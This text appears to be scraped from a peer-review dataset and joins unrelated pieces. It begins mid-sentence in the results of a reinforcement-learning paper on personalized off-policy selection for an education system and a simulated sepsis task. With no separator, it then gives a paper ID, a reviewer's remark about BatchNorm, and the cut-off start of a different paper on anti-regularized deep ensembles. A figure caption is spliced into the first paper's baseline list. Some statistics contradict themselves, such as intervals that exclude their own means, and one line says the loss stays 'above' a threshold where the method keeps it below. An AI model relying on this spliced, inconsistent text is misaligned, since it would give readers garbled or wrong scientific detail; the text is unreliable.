Per-Decision IS (PDIS) \cite{Precup2000}, Fitted-Q Evaluation (FQE) \cite{Le2019}, Weighted... Figure 1: Analysis of main results from the real-world IE experiment. (a) Overall performance of the 6-th semester’s student cohort. Methods that selected the same policy are merged in one bin, i.e., all refers to all three variations (\( \text{raw}, +\text{RRS}, +\text{VRSS} \)) of the existing OPS baselines. (b) Estimated and true policy performance using each method. For OPE, OPE+RRS, OPE+VRSS, results with the least gap between estimated and true rewards among OPE methods (i.e., WIS, FQE+RRS, and FQE+VRSS, respectively) are shown in the figure. True reward refers to the returns averaged over the cohort of the 6-th semester, obtained by deploying the policy selected for each student correspondingly. DR (WDR) ([Thomas & Brunskill, 2016]), MAGIC ([Thomas & Brunskill, 2016]), and Dual stationary Distribution Correction Estimation (DualDICE) ([Nachum et al., 2019]). Existing OPS/OPE with vanilla repeated random sampling (OPS+RRS). We also compare UOPS against a classic data augmentation method in order to evaluate the necessity of the VAE-based method introduced in Section 2.3 – i.e., repeated random sampling (RRS) with replacement of the historical data to perform OPE. RSS has shown superior performance in some human-related tasks, such as disease treatment ([Nie et al., 2022]). Specifically, all OPS/OPE methods considered above are applied to the RRS-augmented offline dataset, where the value of each candidate target policy is obtained by averaging over 20 sampling repetitions. However, note that RRS does not intrinsically consider the temporal relations among state-action transitions as captured by MDP. Existing OPS/OPE with VAE-based RRS (OPS+VRSS). This baseline performs OPS with RRS on augmented samples resulted from the VAE introduced in Section 2.3 in order to allow RRS to consider MDP-typed transitions, hence improve state-action visitation coverage of the augmented dataset. This method can, to some extent, be interpreted as an ablation baseline of UOPS, by removing the sub-group partitioning step (Section 2.2), and slightly tweaking the VAE-based offline dataset augmentation step (Section 2.3) such that it does not need any sub-group information. Specifically, we set the amount of augmented data identical to the amount of original historical data, i.e., \( |\hat{T}| = |\mathcal{T}| = N \), and RRS \( N \) samples from both set \( \hat{T} \cup \mathcal{T} \) to perform OPE. Final estimates are averaged results from 20 repeated sampling processes. UOPS without trajectory augmentation (UOPS-noTA). This is the ablation baseline that completely removes from UOPS the augmentation technique introduced in Section 2.3. UOPS for the population (UOPS-P). We consider an additional ablation baseline that follows the same training steps as UOPS (i.e., steps 1-7 of Alg. 1), but rather select a single policy that is identified (by UOPS) as the best for majority of the sub-groups, to be deployed to all participants. In other words, after training, UOPS produces the mapping \( h : \mathcal{K} \rightarrow \Pi \), while UOPS-P will always deploy to every arriving participant the policy that appears most frequently in the set \( \{h(K_m)|K_m \in \mathcal{K}\} \). 3.2 The Real-World IE Experiment The IE system has been integrated into a undergraduate-level introduction to probability and statistics course over 6 semesters, including a total of 1,288 student participants. This study has received approval from the Institutional Review Board (IRB) at the institution to ensure ethical compliance. Additionally, oversight is provided by a departmental committee, which is responsible for safeguarding the academic performance and privacy of the participants. In this educational context, each learning session revolves around a student’s engagement with a set of 12 problems, with this period referred to as an "episode" (horizon \( T = 12 \)). During each step, the IE system offers students three actions: independent work, utilizing hints, or directly receiving the complete solution (primarily for study purposes). The states space is constituted by 140 features that have been meticulously extracted from the interaction logs by domain experts, which encompass various aspects of the students’ activities, such as the time spent on each problem and the accuracy of their solutions. The learning outcome is issued as the environmental reward at the end of each episode (0 reward for all other steps), measured by the normalized learning gain (NLG) quantified using the scores received from two exams, i.e., one taken before the student start using the system, and another after. Data collected from the first 5 semesters (over a lecturer-designed behavioral policy) are used to train UOPS for selecting from a set of candidate policies to be deployed to each student in the cohort of the 6-th semester, including 3 pre-trained RL policies and 1 benchmark policy (whose performance benchmark the lower-bound of what could be tested with student participants). See Appendix A for the definition of NLG, details on pre-trained RL policies, and more. **Main Results.** Figure 1(a) presents students’ performance under policies selected by different methods. Overall, UOPS was the most effective policy selection leading to the greatest average student performance. The return difference between UOPS and the two ablation, UOPS-noTA and UOPS-P, illustrate the importance of augmenting offline trajectories (as introduced in Section 2.3) and assign to arriving students policies that better fit the characteristics shared within their sub-groups, respectively. Moreover, most existing OPS/OPE methods tend to select sub-optimal policies that resulted in better learning gain than the benchmark policy. Note that we also observed that DualDICE could not distinguish the returns over all target policies; thus, it is unable to be used for policy selection in this experiment and we omit its results. It is also important to evaluate how accurate the value estimation $V^*$ would be for the best candidate policy selected across all methods, over the arriving student cohort at the 6-th semester, as illustrated in Figure 1(b) UOPS provided more accurate policy estimation by achieving the smallest error between true and estimated policy rewards. With VRRS, most OPS methods improved their policy estimation performance, which was benefited from the richer state-action visitation coverage provided by the synthetic samples generated by VRRS. However, even with such augmentations, existing OPS methods still chose sub-optimal policies, which justified the importance of considering participant-specific characteristics in HCSs, which is tackled by sub-group partitioning in UOPS (Section 2.2). **How does UOPS perform within each student sub-group?** For a more comprehensive understanding of student behaviors affected by the policy being deployed in IE, we further investigate how the sub-groups are partitioned and how the policies being assigned to each sub-group perform. Specifically, UOPS identified four subgroups (i.e., $K_1$, $K_2$, $K_3$, $K_4$) as a result of Section 2.2. Under the behavioral policy, the average NLG across all students is 0.9 with slight improvement after tutoring. Specifically, $K_1(N_{train} = 345, N_{test} = 30)$ and $K_2(N_{train} = 678, N_{test} = 92)$ achieved average NLG of 1.9 [95% CI, 1.7, 2.1] and 0.7 [95% CI, 0.6, 0.8] under the behavioral policy, respectively. In the testing (6-th) semester, UOPS constantly selected the best performing policy for students identified as sub-groups $K_1$ and $K_2$, with learning outcomes improvement quantified as 17.7 [95% CI, -1.7, 37.1] and 13.6 [95% CI, -5.2, 32.4] in terms of NLGs, respectively, as shown in Figure 2. This is on the same level achieved by the best possible baseline combinations worked for each student, regardless of the base OPS algorithm used, i.e., the union of the best performance reported from the 18 baselines involving existing OPS methods (introduced in the first 3 paragraphs of Section 5.1) over each student. However, note that in reality one does not have access to such an oracle in terms of which 1 out of the 18 baseline methods would work well for each arriving student upfront (i.e., at the beginning of the semester). In contrast, UOPS achieved the same level of performance without the need for an oracle. Note that sub-groups $K_1$ and $K_2$, were less sensitive to target policies and achieved positive NLG in both training and testing semester. On the other hand, offline data over the behavioral policy showed that $K_3(N_{train} = 101, N_{test} = 12)$ and $K_4(N_{train} = 24, N_{test} = 6)$ are associated with negative average NLGs of -0.5 [95% CI, 1.7, 2.1] and -1.5 [95% CI, -0.3, 1.2], respectively, which can be considered low performers. It is observed that students in sub-group $K_3$ performed kept moving --- 2CI stands for confidence interval. rapidly among questions while working on the IE system, indicating that they were not seriously tackling any one of the questions; while participants in $K_4$ abused hints, but still made much more mistakes in the meantime. Figure 2 also presents the NLG of students from the low-performing subgroups $K_3$ and $K_4$ under policies selected by the best existing-OPS baselines (following the oracle as above) and UOPS. Under UOPS, both subgroups achieved significant improvement (average NLGs 24.0 [95% CI, 10.2, 37.7] and 31.7 [95% CI, 10.1, 53.3], respectively) compared to students in historical semesters. However, the sub-optimal policy chosen by baselines had a negative effect on both sub-groups (average NLGs -11.7 [95% CI, -18.1, -5.3] and -19.9 [95% CI, -72.1, 32.4], respectively); see Figure 1(a). Such an observation particularly justifies the need for personalizing the policies deployed to different type of participants (i.e., students), especially for the sub-groups (i.e., low-performers), since they can be more sensitive to policy selection. Based on the statistics reported above, UOPS improved the NLG of students by 208% over the lecturer-designed behavioral policy, and by 136% over the union of the best performance achieved across existing-OPS-based baselines. To this end, the UOPS framework has the potential to facilitate fairness in RL-empowered HCSs in general – we have discussed this in details in Appendix A.3. ### 3.3 The Healthcare Experiment In this experiment, we consider selecting the policy that can best treat sepsis for each patient in the ICU, leveraging the simulated environment introduced by Oberst & Sontag (2019), which has been widely adopted in existing works (Hao et al., 2021; Nie et al., 2022; Tang & Wiens, 2021; Lorberbom et al., 2021; Gao et al., 2023; Namkoong et al., 2020). Specifically, the state space is constituted by a binary indicator for diabetes, and four vital signs {heart rate, blood pressure, oxygen concentration, glucose level} that take values in a subset of {very high, high, normal, low, very low}; size of the state space is $|S| = 1440$. Actions are captured by combinations of three binary treatment options, {antibiotics, vasopressors, mechanical ventilation}, which lead to $|A| = 2^3$. Following Namkoong et al. (2020), three candidate target policies are considered, i.e., (i) without antibiotics (WOA) which does not administer antibiotics right after the patient is admitted, (ii) with antibiotics (WA) that always administer antibiotics once the patient is admitted, (iii) an RL policy trained following policy iteration (PI). Note that as pointed by Namkoong et al. (2020), the true returns of WA and PI are usually close, since antibiotics are in general helpful for treating sepsis, which is also observed in our experiment; see Table 1. Moreover, a simulated unrecorded comorbidities is applied to the cohort, capturing the uncertainties caused by patient’s underlying diseases (or other characteristics), which could reduce the effects of the antibiotics being administered. See Appendix C.4 for more details in regards to the environmental setup. Given the simulated environment, we mainly consider using this experiment to evaluate the source of improvement brought in by the sub-group partitioning step (Section 2.2) in UOPS. Specifically, multiple scaled offline datasets are generated, representing different degrees of the state-action visitation coverage – we vary the total number of trajectory $N=\{2,500, 5,000, 10,000\}$, in lieu of performing trajectory augmentations for both UOPS and existing OPS baselines. In other words, in this experiment, we consider the UOPS without the VAE augmentation step introduced in Section 2.3, as well as the 6 original OPS baselines (without any RRS/VRRS) introduced in Section 3.1. We believe this setup would help isolate the source of improvements brought in by sub-group partitioning. The average absolute errors (AEs), in terms of OPE, and returns, in terms of OPS, resulted from deploying to each patient the corresponding candidate policy selected by UOPS against baselines, are reported in Table 1. It can be observed that UOPS achieved the lowest AE and highest return regardless of the size of the offline dataset. We additionally evaluate the top-1 regret (i.e., regret@1) of the selected policy following UOPS and baselines, which are also reported in Table 1. It can be observed that UOPS achieved exceedingly low regrets compared to baselines. Both observations emphasize the effectiveness of the sub-group partitioning technique leveraged by UOPS, as the environment does capture comorbidities as part of the participant characteristics. Moreover, the AEs and regrets of most methods decrease when the size of offline dataset increase, justifying that improved state-action visitation coverage provided by the offline trajectories is crucial for reducing estimation errors and improving policy selection outcomes (i.e., the motivation of trajectory augmentation introduced in Section 2.3). ### 4 Related Works **Off-policy selection (OPS).** OPS are typically approached via OPE in existing works, by estimating the expected return of target policies using historical data collected under a behavior policy. A Table 1: The absolute errors (AEs) and returns resulted from deploying to each patient the corresponding candidate policy selected by UOPS against baselines, as well as the top-1 regret (regret@1) of the selected policy, averaged over 10 different simulation runs. Standard errors are rounded. | N=2,500 | AE | WIS | PDIS | FQE | WDR | MAGIC | |---------|--------|-------|-------|-------|-------|-------| | | 0.026±0.00 | 0.054±0.00 | 0.109±0.00 | 0.070±0.01 | 8.281±0.00 | 5.681±0.00 | | Return | 0.132±0.02 | 0.121±0.01 | 0.121±0.01 | 0.129±0.00 | 0.121±0.01 | 0.129±0.00 | | Regret@1 | 0.042±0.01 | 0.066±0.00 | 0.066±0.00 | 0.106±0.09 | 0.066±0.00 | 0.106±0.09 | | N=5,000 | AE | WIS | PDIS | FQE | WDR | MAGIC | |---------|--------|-------|-------|-------|-------|-------| | | 0.006±0.00 | 0.046±0.00 | 0.082±0.00 | 0.073±0.01 | 3.443±0.01 | 3.238±0.01 | | Return | 0.149±0.01 | 0.123±0.01 | 0.123±0.01 | 0.121±0.01 | 0.123±0.01 | 0.123±0.01 | | Regret@1 | 0.020±0.00 | 0.050±0.00 | 0.050±0.00 | 0.208±0.13 | 0.050±0.00 | 0.050±0.00 | | N=10,000 | AE | WIS | PDIS | FQE | WDR | MAGIC | |----------|--------|-------|-------|-------|-------|-------| | | 0.022±0.00 | 0.022±0.00 | 0.097±0.00 | 0.105±0.00 | 0.995±0.01 | 1.210±0.01 | | Return | 0.130±0.00 | 0.129±0.00 | 0.121±0.00 | 0.121±0.00 | 0.121±0.00 | 0.121±0.00 | | Regret@1 | 0.016±0.00 | 0.019±0.00 | 0.029±0.01 | 0.029±0.01 | 0.029±0.01 | 0.029±0.01 | A variety of contemporary OPE methods has been proposed, which can be mainly divided into three categories (Voloshin et al., 2021b): (i) direct methods that directly estimate the value functions of the evaluation policy (Nachum et al., 2019; Uehara et al., 2020; Zhang et al., 2021; Yang et al., 2022), including but not limited to model-based estimators (MB) (Paduraru, 2013; Zhang et al., 2021), value-based estimators (Le et al., 2019) such as Fitted Q Evaluation (FQE), and minimax estimators (Liu et al., 2018; Zhang et al., 2020; Voloshin et al., 2021a) such as DualDICE (Yang et al., 2020); (ii) inverse propensity scoring, or indirect methods (Precup, 2000; Doroudi et al., 2017), such as Importance Sampling (IS) (Doroudi et al., 2017); (iii) hybrid methods combine aspects of both inverse propensity scoring and direct methods (Jiang & Li, 2016; Thomas & Brunskill, 2016), such as DR (Jiang & Li, 2016). In practice, due to expensive online evaluations, researchers generally selected the policy with the highest estimated rewards via OPE. For example, Mandel et al. selected the policy with the maximum IS score to be deployed to an educational game (Mandel et al., 2014). Recently, some works focused on estimator selection or hyperparameter tuning in off-policy selection (Nie et al., 2022; Zhang & Jiang, 2021; Xie & Jiang, 2021; Su et al., 2020; Miyaguchi, 2022; Kumar et al., 2022; Lee et al., 2022; Tang & Wiens, 2021; Paine et al., 2020). However, retraining policies may not be feasible in HCSs as online data collection is time- and resource-consuming. More importantly, prior work generally selected policies without considering the characteristics of participants, while personalized policy is favored towards the needs specific to HCSs. **RL-empowered automation in HCSs.** In modern HCSs, RL has raised significant attention toward enhancing the experience of human participants. Previous studies have demonstrated that RL can induce IE policies (Shen & Chi, 2016; Mandel et al., 2014; Wang et al., 2017; Zhou et al., 2022; Sanz Ausin et al., 2020). For example, Zhou et al. (Zhou et al., 2022) applied hierarchical reinforcement learning (HRL) to improve students’ normalized learning gain in a Discrete Mathematics course, and the HRL-induced policy was more effective than the Deep Q-Network induced policy. Similarly, in healthcare, RL has been used to synthesize policies that can adapt high-level treatment plans (Raghu et al., 2017; Namkoong et al., 2020; Lorberbom et al., 2021), or to control medical devices and surgical robotics from a more granular level (Gao et al., 2020; Lu et al., 2019; Richter et al., 2019). Since online evaluation/testing is high-stake in practical HCSs, effective OPS methods are important in closing the loop, by significantly reducing the resources needed for online testing/deployment and preemptively justifying safety of the policies subject to be deployed. ## 5 Conclusion and Limitation In this work, we introduced the UOPS framework that facilitated policy selection in HCSs; it tackled the heterogeneity of participants by sub-group partitioning. Unlike existing OPS methods, UOPS customized the policy selection criteria for each sub-group respectively. UOPS was tested in a real-world IE experiment and a simulated sepsis treatment environment, which significantly outperformed baselines. Though in the future it would be possible to extend UOPS to a offline RL policy optimization framework, however, in this work we specifically focus on the OPS task in order to isolate the source of improvements brought in by sub-group partitioning and trajectory augmentation. Future avenues along the line of UOPS also include deriving estimators (for Theorem 1) that allow bias-variance trade off, e.g., by integrating WDR or MAGIC (to substitute the IS weights). REFERENCES Karo Castro-Wunsch, Alireza Ahadi, and Andrew Petersen. Evaluating neural networks as a method for identifying students in need of assistance. In *Proceedings of the 2017 ACM SIGCSE technical symposium on computer science education*, pp. 111–116, 2017. Yash Chandak, Shiv Shankar, Nathaniel Bastian, Bruno da Silva, Emma Brunskill, and Philip S Thomas. Off-policy evaluation for action-dependent non-stationary environments. *Advances in Neural Information Processing Systems*, 35:9217–9232, 2022. Lili Chen, Kevin Lu, Aravind Rajeswaran, Kimin Lee, Aditya Grover, Misha Laskin, Pieter Abbeel, Aravind Srinivas, and Igor Mordatch. Decision transformer: Reinforcement learning via sequence modeling. *Advances in neural information processing systems*, 34:15084–15097, 2021. Min Chi, Kurt VanLehn, Diane Litman, and Pamela Jordan. Empirically evaluating the application of reinforcement learning to the induction of effective and adaptive pedagogical strategies. *User Modeling and User-Adapted Interaction*, 21(1):137–180, 2011. Corinna Cortes, Yishay Mansour, and Mehryar Mohri. Learning bounds for importance weighting. *Advances in neural information processing systems*, 23, 2010. Shayan Doroudi, Philip S Thomas, and Emma Brunskill. Importance sampling for fair policy selection. *Grantee Submission*, 2017. Salma Elmalaki. Fair-iot: Fairness-aware human-in-the-loop reinforcement learning for harnessing human variability in personalized iot. In *Proceedings of the International Conference on Internet-of-Things Design and Implementation*, pp. 119–132, 2021. Justin Fu, Mohammad Norouzi, Ofir Nachum, George Tucker, Alexander Novikov, Mengjiao Yang, Michael R Zhang, Yutian Chen, Aviral Kumar, Cosmin Paduraru, et al. Benchmarks for deep off-policy evaluation. In *International Conference on Learning Representations*, 2021a. Justin Fu, Mohammad Norouzi, Ofir Nachum, George Tucker, Ziyu Wang, Alexander Novikov, Mengjiao Yang, Michael R Zhang, Yutian Chen, Aviral Kumar, et al. Benchmarks for deep off-policy evaluation. *arXiv preprint arXiv:2103.16596*, 2021b. Ge Gao, Samiha Marwan, and Thomas W Price. Early performance prediction using interpretable patterns in programming process data. In *Proceedings of the 52nd ACM technical symposium on computer science education*, pp. 342–348, 2021. Ge Gao, Song Ju, Markel Sanz Ausin, and Min Chi. Hope: Human-centric off-policy evaluation for e-learning and healthcare. *arXiv preprint arXiv:2302.09212*, 2023. Qitong Gao, Michael Naumann, Ilija Jovanov, Vuk Lesi, Karthik Kamaravelu, Warren M Grill, and Miroslav Pajic. Model-based design of closed loop deep brain stimulation controller using reinforcement learning. In *2020 ACM/IEEE 11th International Conference on Cyber-Physical Systems (ICCPS)*, pp. 108–118. IEEE, 2020. Qitong Gao, Ge Gao, Min Chi, and Miroslav Pajic. Variational latent branching model for off-policy evaluation. In *The Eleventh International Conference on Learning Representations*, 2022. Karan Goel, Albert Gu, Yixuan Li, and Christopher Re. Model patching: Closing the subgroup performance gap with data augmentation. In *International Conference on Learning Representations*, 2021. Tuomas Haarnoja, Aurick Zhou, Pieter Abbeel, and Sergey Levine. Soft actor-critic: Off-policy maximum entropy deep reinforcement learning with a stochastic actor. In *International conference on machine learning*, pp. 1861–1870. PMLR, 2018. Danijar Hafner, Timothy Lillicrap, Jimmy Ba, and Mohammad Norouzi. Dream to control: Learning behaviors by latent imagination. In *International Conference on Learning Representations*, 2020. David Hallac, Sagar Vare, Stephen Boyd, and Jure Leskovec. Toeplitz inverse covariance-based clustering of multivariate time series data. In *ACM SIGKDD Int. Conf. on Knowledge Discovery and Data Mining*, pp. 215–223, 2017.
oDYXpvnv5f
In networks with normalization layers, e.g. BatchNorm, the network would become scale-invariance, then increasing the weight in intermediate layers would not change the output. The proposed method could therefore be less effective.
DEEP ANTI-REGULARIZED ENSEMBLES Anonymous authors Paper under double-blind review ABSTRACT We consider the problem of uncertainty quantification in high dimensional regression and classification, for which deep ensemble have proven to be promising methods. Recent observations have shown that deep ensemble return overconfident estimates outside the training domain, which is a major limitation because shifted distributions are often encountered in real-life scenarios. The principal challenge in solving this problem is to solve the trade-off between increasing the diversity of the ensemble outputs and making accurate in-distribution predictions. In this work, we show that an ensemble of large weights networks fitting the training data are likely to meet these two objectives. We derive a simple and practical approach to produce such ensembles, based on an original anti-regularization term penalizing small weights and a control process of the weight increase which maintains the in-distribution loss under an acceptable threshold. The developed approach does not require any out-of-distribution training data neither any trade-off hyper-parameter calibration. We derive a theoretical framework for the approach and show that the proposed optimization can be seen as a "water-filling" problem. Several experiments in both regression and classification settings highlight that Deep Anti-Regularized Ensembles (DARE) significantly improve uncertainty quantification outside the training domain in comparison to recent deep ensemble and out-of-distribution detection methods. All the conducted experiments are reproducible and the source code is available at https://github.com/AnonymousAccount3/dare. 1 INTRODUCTION With the adoption of deep learning models in a variety of real-life applications such as autonomous vehicles (Choi et al., 2019; Feng et al., 2018), or industrial product certification (Mamalet et al., 2021), providing uncertainty quantification for their predictions becomes critical. Indeed, various adaptations of classical uncertainty quantification methods to deep learning predictions have been recently introduced as Bayesian neural networks (Mackay, 1992; Neal, 2012), MC-dropout (Gal & Ghahramani, 2016), quantile regression (Romano et al., 2019) and deep ensembles (Lakshminarayanan et al., 2017; Wen et al., 2020; Wenzel et al., 2020). These methods appear to be quite efficient in predicting the uncertainty in the training domain (the domain defined by the training set), called in-distribution uncertainty (Abdar et al., 2021). However, when dealing with data outside the training distribution, i.e. out-of-distribution data (OOD), the uncertainty estimation often appears to be overconfident (D’Angelo & Henning, 2021; Liu et al., 2021; Ovadia et al., 2019). This is a critical issue, because deep models are often deployed on shifted distributions (de Mathelin et al., 2021; Saenko et al., 2010; Xu et al., 2019); overconfidence on an uncontrolled domain can lead to dramatic consequences in autonomous cars or to poor industrial choices in product design. The problem to be solved is to increase the output diversity of the ensemble in regions where no data are available during training. This is a very challenging task as neural network outputs are difficult to control outside of the training data regions. In this perspective, contrastive methods make use of real (Pagliardini et al., 2022; Tifrea et al., 2022) or synthetic (Jain et al., 2020; Mehrtens et al., 2022; Segonne et al., 2022) auxiliary OOD data to constrain the network output out-of-distribution. However, these approaches cannot guarantee prediction diversity for unseen OOD data as the auxiliary sample may not be representative of real OODs encountered by the deployed ensemble. Another set of methods assumes that the diversity of the ensemble outputs is linked to the diversity of the networks’ architectures (Zaidi et al., 2021), hyper-parameters (Wenzel et al., 2020), internal... representations (Ramé & Cord, 2021; Sinha et al., 2021) or weights (D’Angelo & Fortuin, 2021; Pearce et al., 2018). The main difficulty encountered when using these approaches is to solve the trade-off between increasing the ensemble diversity and returning accurate prediction in-distribution. The current approach to deal with this issue consists in setting a trade-off parameter with hold-out validation (Jain et al., 2020; Liu & Yao, 1999; Pearce et al., 2018) which is time consuming and often penalizes the diversity. Considering these difficulties, the question that arises is how to ensure important output diversity for any unknown data region while maintaining accurate in-distribution predictions? In this work, we tackle this question with the following reasoning: an ensemble of networks with large weight variance essentially produces large output variance for any data points. Furthermore, to make accurate prediction on the training distribution, the output variance for training data needs to be reduced, which requires that some of the network’s weights are also reduced. However, to prevent the output variance from being reduced anywhere other than the training domain, the network weights should then be kept as large as possible. Following this reasoning, we seek an ensemble providing accurate prediction in-distribution and keeping the weights as large as possible. To meet these two objectives, deviating from traditional recommendations for deep learning training, we propose an "anti-regularization" process that consists in penalizing small weights during training optimization. To find the right trade-off between increasing the weights and returning accurate prediction in-distribution, a control process activates or deactivates the weight increase after each batch update if the training loss is respectively under or above a threshold. Thus, the increase of the weights induces an increase of the prediction variance while the control on the loss enforces accurate in-distribution predictions. Synthetic experiments on toy datasets confirm the efficiency of our proposed approach (cf Figure 1). We observe that the uncertainty estimates of our Deep Anti-Regularized Ensembles (DARE) increase for any data point deviating from the training domain, whereas, for the vanilla deep ensemble, the uncertainty estimates remain low for some OOD regions. The contributions of the present work are the followings: 1) A novel and simple anti-regularization strategy is proposed to increase deep ensemble diversity. 2) An original control process addresses the trade-off issue between in-distribution accuracy and reliable OOD uncertainty estimates. 3) We provide theoretical arguments to understand DARE as a "water-filling" optimization problem where a bounded global amount of variance is dispatched among the network weights. 4) A new experimental setup for uncertainty quantification with shifted distribution is developed for regression. Experiments are also conducted for out-of-distribution detection on classification datasets. 2 DEEP ANTI-REGULARIZED ENSEMBLE 2.1 OPTIMIZATION FORMULATION We consider the supervised learning scenario where \( \mathcal{X} \) and \( \mathcal{Y} \) are respectively the input and output space. The learner has access to a training sample, \( S = \{(x_1, y_1), \ldots, (x_n, y_n)\} \in \mathcal{X} \times \mathcal{Y} \) of size \( n \in \mathbb{N} \). We consider a set \( \mathcal{H} \) of neural networks \( h_\theta \in \mathcal{H} \) where \( \theta \in \mathbb{R}^d \) refers to the network weights. We consider a loss function $\ell : \mathcal{Y} \times \mathcal{Y} \to \mathbb{R}_+$ and define the average error of any $h_\theta \in \mathcal{H}$ on $\mathcal{S}$, $$L_S(h_\theta) = \frac{1}{n} \sum_{(x_i, y_i) \in S} \ell(h_\theta(x_i), y_i).$$ Traditional deep learning training generally involves the use of weight regularization to avoid overfitting. A penalization term $R(\theta)$ is added to the average error to form the objective function $L_S(h_\theta) + R(\theta)$ with $R(\theta)$ increasing with $\theta$ (e.g., $\ell_2$ and $\ell_1$ regularization). However, when used for deep ensemble, such regularization fosters the production of neural networks with small weights, which are then "close" to each others in the weight space and then lack of diversity. The same effect is also induced by the implicit regularization of gradient descent algorithm (Smith et al., 2020). Based on these considerations, we propose the complete opposite approach, which consists in "anti-regularizing" the networks’ weights as follows: $$\min_\theta L_S(h_\theta) - \lambda R(\theta).$$ with $R : \mathbb{R}^d \to \mathbb{R}_+$ a monotone function growing with $\theta$ and $\lambda$ a trade-off parameter. The first term of the optimization objective in Eq. (1): $L_S(h_\theta)$ is the loss in-distribution. This term conditions the network to fit the training data which implies smaller in-distribution prediction variances. The second term $-\lambda R(\theta)$ acts as an "anti-regularization" term which induces an increase of the network weights. This implies a larger variance of the ensemble weights, and therefore a larger prediction variance, especially for data "far" from the training distribution on which the network’s predictions are not conditioned. The parameter $\lambda \in \{0, 1\}$ is a binary variable which controls the trade-off between the in-distribution loss and the anti-regularization term. At each batch computation, $\lambda$ is updated as follows: $$\lambda = \begin{cases} 1 & \text{if } L_S(h_\theta) \leq \tau \\ 0 & \text{if } L_S(h_\theta) > \tau, \end{cases}$$ with $\tau \in \mathbb{R}$ a predefined threshold. The underlying idea of the proposed optimization is that, to fulfill both objectives: reducing the loss in-distribution and increasing the weights, large weights will appear more likely in front of neurons which are never or weakly activated by the training data. Therefore, if an out-of-distribution data point activates one of these neurons, large values are propagated through the networks, which induces larger prediction variances. We show, in Sections 2.3 and 4.1, that this claim is supported by theoretical analysis and empirical observations. The control process is necessary to temper the weight increase, because a large increase of the weights induces an unstable network with reduced accuracy on training data. To be sure to fulfill a performance threshold $\tau$, the weight increase is stopped ($\lambda = 0$) until the loss in-distribution comes back under the threshold. Therefore, the resulting ensemble is composed of networks fitting the training data with weights as large as possible. ### 2.2 IMPLEMENTATION **Parallel optimization.** Each network of the ensemble is trained with batch gradient descent, independently of the others, with the objective of Eq. (1). This approach allows for parallel training of the ensemble. It is theoretically possible that each network ends up reaching the same optimum resulting in no ensemble diversity. However, we empirically observe that this degenerate case never occurs due to the random process of the optimization and aleatoric weights initialization. **Regularization function.** We propose the following choice of regularization function: $$R(\theta) = \frac{1}{d} \sum_{k=1}^{d} \log(\theta_k^2)$$ With $\theta = (\theta_1, ..., \theta_k)$ the network weights. The use of the logarithmic function is motivated by the "water-filling" interpretation of DARE (cf. Section 2.3). **Control threshold and Model Saving.** The control threshold $\tau$ should be chosen by the learner based on his targeted error level in-distribution. Smaller $\tau$ leads to smaller increase of the weights. For $\tau = -\infty$, DARE is equivalent to a vanilla deep ensemble. An intuitive value of $\tau$ is close to the validation loss of a vanilla network. We propose, in this work, to set $\tau = L_{\text{val}}(h)(1 + \delta)$ with $\delta > 0$ and $h$ a vanilla network from a deep ensemble. Regarding the model saving across epochs, we propose to save the model when the validation loss is below $\tau$. Indeed, a small penalization of the validation loss should be accepted to enable the weight increase. ### 2.3 Theoretical Analysis for Linear Regression The purpose of this theoretical analysis section is to provide an understanding of the underlying dynamic of DARE. We focus our analysis on the linear regression case. This setting offers valuable insights on what happen between two layers of a fully-connected neural network. We consider the regression problem where $X \in \mathbb{R}^{n \times p}$ and $y \in \mathbb{R}^{n \times 1}$ are respectively the input and output data which compose the training set $S$. We consider the ensemble of linear hypotheses $\mathcal{H} = \{x \rightarrow x^T \theta; \theta \in \mathbb{R}^p\}$. To simplify the calculation without loosing in generality, we assume that there exists $\theta^* \in \mathbb{R}^p$ such that $\mathcal{L}_S(h_{\theta^*}) = 0$. The loss function is the mean squared error such that for any $h_\theta \in \mathcal{H}$ we have $n\mathcal{L}_S(h_\theta) = ||X\theta - y||_2^2$. We denote $s^2 = (s_1^2, ..., s_p^2) \in \mathbb{R}_+^p$ the diagonal of the matrix $\frac{1}{n}X^TX$. We now consider an anti-regularized ensemble $\mathcal{H}_\tau$. To characterize this ensemble, we make the following assumptions for any $h_\theta \in \mathcal{H}_\tau$: $$\theta \sim \Theta_{\sigma^2}; \quad \mathbb{E}[\theta] = \theta^*, \quad \text{Cov}(\theta) = \text{diag}(\sigma^2)$$ $$\mathbb{E}[\mathcal{L}_S(h_\theta)] \leq \delta \tau$$ Where $\delta > 0$ and $\text{diag}(\sigma^2)$ is the diagonal matrix of values $\sigma^2 \in \mathbb{R}_+^p$ verifying: $$\sigma^2 = \arg\max_{\sigma^2=(\sigma_1^2,...,\sigma_p^2)} \sum_{k=1}^p \log \left( \theta_k^* + \sigma_k^2 \right)$$ As presented in Assumption 4, the large weights ensemble distribution is described by the random variable $\theta$ centered in $\theta^*$ with variance $\sigma^2$. Assumption 5 implies that $P(\mathcal{L}_S(h_\theta) \geq \tau) \leq \delta$, by Markov inequality, which models the fact that the loss of each member of DARE is maintained above a threshold $\tau$ thanks to the control process on $\lambda$ (cf Section 2.1). Definition 6 approximates the impact of the anti-regularization term $-\mathcal{R}(\theta)$ in the DARE optimization formulation with an upper bound of $\max_\sigma \mathbb{E}[\mathcal{R}(\theta)]$. The weights are increased as much as possible while the loss stays under the threshold. Our first theoretical result shows that the weight variance of the anti-regularized ensemble is solution of a "water-filling" optimization problem (Boyd et al., 2006), and is proportional to $1/s^2$, i.e. the inverse of the input features variance. **Theorem 1.** There exist a constant $C > 0$ such that for any $k \in [1, p]$, the variance of the $k^{th}$ weight component is expressed as follows: $$\sigma_k^2 = \max \left[ \frac{C \delta \tau}{s_k^2} - \theta_k^*^2, 0 \right]$$ **Sketch of Proof.** A detailed proof is reported in Appendix. The proof consists in first noticing that $\mathbb{E}[\mathcal{L}_S(h_\theta)] = \sum_{k=1}^p s_k^2 \sigma_k^2$. By combining this result with Assumptions 5 and 6 we show that $\sigma^2$ is solution of the above water filling problem: $$\maximize_{\sigma^2 \in \mathbb{R}_+^p} \sum_{k=1}^p \log(\sigma_k^2 + \theta_k^*^2)$$ subject to $\sum_{k=1}^p s_k^2 \sigma_k^2 \leq \delta \tau$ As log is strictly concave, and the constraints form a compact set on $\mathbb{R}^p$, the problem (8) has a unique solution which is given by (7). The "water-filling" interpretation of the DARE optimization (8) is very insightful: $\delta \tau$ is the "global variance capacity" that can be dispatched to the network weights. As, it grows as a function of $\tau$, the more the learner accept a large error in-distribution, the more the global variance capacity increases. We see that each weight component has a different "variance cost" equal to $s_k^2$: for high feature variance $s_k^2$, the increase of the corresponding weight variance $\sigma_k^2$ penalizes more the training loss. Thus, large weights appear more likely in front of low variance features. Notice also that, when $\theta_k^*$ is high, $\frac{C \delta 